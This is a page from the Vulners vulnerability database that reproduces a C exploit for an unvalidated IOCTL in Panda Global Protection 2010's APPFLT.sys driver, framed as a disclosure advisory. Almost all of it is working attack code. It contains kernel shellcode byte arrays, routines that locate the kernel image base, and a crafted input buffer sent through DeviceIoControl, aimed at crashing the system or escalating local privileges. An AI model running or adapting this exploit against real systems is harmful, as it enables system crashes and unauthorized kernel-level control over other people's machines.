Vulners
Lucene search
Panda Global Protection 2010 local Dos (unfiltered wcscpy())
#include <windows.h>
#include <string.h>
#include <ddk/ntapi.h>
#include <tlhelp32.h>
#define SystemModuleInfo 11
/*
Program : Panda Global Protection 2010 (3.01.00)
Homepage : http://www.pandasecurity.com
Discovery : 2010/04/09
Author Contacted : 2010/07/15
Status of vuln : Patched !
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]
//----- Application description
Antivirus Global Protection 2010 is the most complete product, with everything
you need to protect your computer and information. It protects you from viruses,
spyware, rootkits, hackers, online fraud, identity theft and all other Internet
threats. The anti-spam engine will keep your inbox free from junk mail while the
Parental Control feature will keep your family safe when using the Internet. You
can also back up important files (documents, music, photos, etc.) to a CD/DVD or
online (5GB free space available) and restore them in case of accidental loss or
damage. And thanks to the most innovative and new detection technologies and improved
Collective Intelligence, the solution is now much faster than previous versions.
//----- Description of vulnerability
APPFLT.sys driver don't check inputs integers of an IOCTL. An exception can be
thrown if we modify one DWORD.
Exploit isn't functional but with few work it can be a local privilege escalation.
//----- Credits
http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org
s.leberre at sysdream dot com
heurs at ghostsinthestack dot org
//----- Greetings
Mysterie
*/
char ShellcodeMaster[] =
"\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";
char RealShellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
"\x15\xf3\x1d\xb8";
typedef struct _SYSTEM_MODULE_ENTRY
{
ULONG Unused;
ULONG Always0;
PVOID ModuleBaseAddress;
ULONG ModuleSize;
ULONG Unknown;
ULONG ModuleEntryIndex;
USHORT ModuleNameLength;
USHORT ModuleNameOffset;
CHAR ModuleName [256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
DWORD GetDataSection(HANDLE ImageBase){
IMAGE_DOS_HEADER * mDosHeader;
IMAGE_NT_HEADERS * mNtHeader;
IMAGE_SECTION_HEADER * mSecHeader;
int i;
mDosHeader = (PIMAGE_DOS_HEADER) ImageBase;
if (mDosHeader->e_magic != 0x5A4D) {
return 0;
}
mNtHeader = (PIMAGE_NT_HEADERS) (mDosHeader->e_lfanew + ImageBase);
if (mNtHeader->Signature != 0x00004550) {
return 0;
}
mSecHeader = (PIMAGE_SECTION_HEADER) (mDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS) + ImageBase);
for (i=0; i<mNtHeader->FileHeader.NumberOfSections; i++){
if (!strcmp(mSecHeader->Name, ".data"))
return mSecHeader->VirtualAddress;
mSecHeader++;
}
return 0;
}
PVOID KernelGetModuleBase(PCHAR pModuleName)
{
PVOID pModuleBase = NULL;
PULONG pSystemInfoBuffer = NULL;
NTSTATUS status = STATUS_INSUFFICIENT_RESOURCES;
ULONG SystemInfoBufferSize = 0;
status = ZwQuerySystemInformation(SystemModuleInfo,
&SystemInfoBufferSize,
0,
&SystemInfoBufferSize);
if (!SystemInfoBufferSize){
return NULL;
}
pSystemInfoBuffer = (PULONG)malloc(SystemInfoBufferSize*2);
if (!pSystemInfoBuffer){
return NULL;
}
memset(pSystemInfoBuffer, 0, SystemInfoBufferSize*2);
status = ZwQuerySystemInformation(SystemModuleInfo,
pSystemInfoBuffer,
SystemInfoBufferSize*2,
&SystemInfoBufferSize);
if (NT_SUCCESS(status))
{
PSYSTEM_MODULE_ENTRY pSysModuleEntry =
(PSYSTEM_MODULE_ENTRY)((PSYSTEM_MODULE_INFORMATION)(pSystemInfoBuffer))->Module;
ULONG i;
for (i = 0; i <((PSYSTEM_MODULE_INFORMATION)(pSystemInfoBuffer))->Count; i++)
{
if (_stricmp(pSysModuleEntry[i].ModuleName +
pSysModuleEntry[i].ModuleNameOffset, pModuleName) == 0)
{
pModuleBase = pSysModuleEntry[i].ModuleBaseAddress;
break;
}
}
}
if(pSystemInfoBuffer) {
free(pSystemInfoBuffer);
}
return pModuleBase;
} // end KernelGetModuleBase()
int __cdecl main(int argc, char* argv[])
{
HANDLE hDevice = (HANDLE) 0xffffffff;
DWORD NombreByte;
DWORD Crashing[] = {
0xaaaaaaaa, 0xbbbbbbbb, 0xcccccccc, 0xdddddddd,
0xeeeeeeee, 0x11111111, 0x001cfdea, 0x002dc6c0,
0x000000a8, 0x0044005c, 0x00760065, 0x00630069,
0x005c0065, 0x00610048, 0x00640072, 0x00690064,
0x006b0073, 0x006f0056, 0x0075006c, 0x0065006d,
0x005c0031, 0x00720050, 0x0067006f, 0x00610072,
0x0020006d, 0x00690046, 0x0065006c, 0x005c0073,
0x00610050, 0x0064006e, 0x00200061, 0x00650053,
0x00750063, 0x00690072, 0x00790074, 0x0050005c,
0x006e0061, 0x00610064, 0x00470020, 0x006f006c,
0x00610062, 0x0020006c, 0x00720050, 0x0074006f,
0x00630065, 0x00690074, 0x006e006f, 0x00320020,
0x00310030, 0x005c0030, 0x00650057, 0x00500062,
0x006f0072, 0x00790078, 0x0065002e, 0x00650078,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x00112200, 0x00112200, 0x00112200,
0x00112200, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420, 0x19653420, 0x19653420, 0x19653420,
0x19653420
};
char out[sizeof(Crashing)];
DWORD ShellcodeToExecute;
DWORD KernelImageBase;
DWORD KernelPointerDeref;
DWORD VirtImageBaseKnl;
DWORD NullAddress;
KEVENT NewKevent;
int i = 0x1000;
printf("Local Privilege Escalation - Panda Global Protection 2010 (3.01.00)\n\n");
hDevice = CreateFile("\\\\.\\AppFlt",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x00110000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x00110000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x19653420, 0x1000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x19653420, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy((void*)0x19653420, ShellcodeMaster, sizeof(ShellcodeMaster));
KernelImageBase = (DWORD) KernelGetModuleBase("ntoskrnl.exe");
if (!KernelImageBase){
KernelImageBase = (DWORD) KernelGetModuleBase("ntkrnlpa.exe");
VirtImageBaseKnl = (DWORD) LoadLibrary("ntkrnlpa.exe");
KernelPointerDeref = KernelImageBase + GetDataSection((HANDLE)VirtImageBaseKnl) + 0x3C;
} else {
VirtImageBaseKnl = (DWORD) LoadLibrary("ntoskrnl.exe");
KernelPointerDeref = KernelImageBase + 0x3C;
}
Crashing[469] = (KernelPointerDeref - 0x750) ^ 0x19653420;
memcpy((PVOID)0x001129f9, &Crashing[60], 4);
memcpy((PVOID)0x001129f9 + 0x4, &Crashing[60], 4);
memcpy((PVOID)0x001129f9 + 0x8, &Crashing[60], 4);
memcpy((PVOID)0x001129f9 + 0xC, &Crashing[60], 4);
memcpy((PVOID)0x001129f9 + 0x10, &Crashing[60], 4);
memcpy((PVOID)0x001129f9 + 0x16, &Crashing[60], 4);
DeviceIoControl(hDevice,0x06660E1C,Crashing,sizeof(Crashing),out,sizeof(Crashing),&NombreByte,NULL);
printf("Sploit Send.\nhDevice = %x\n", hDevice);
CloseHandle(hDevice);
getch();
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1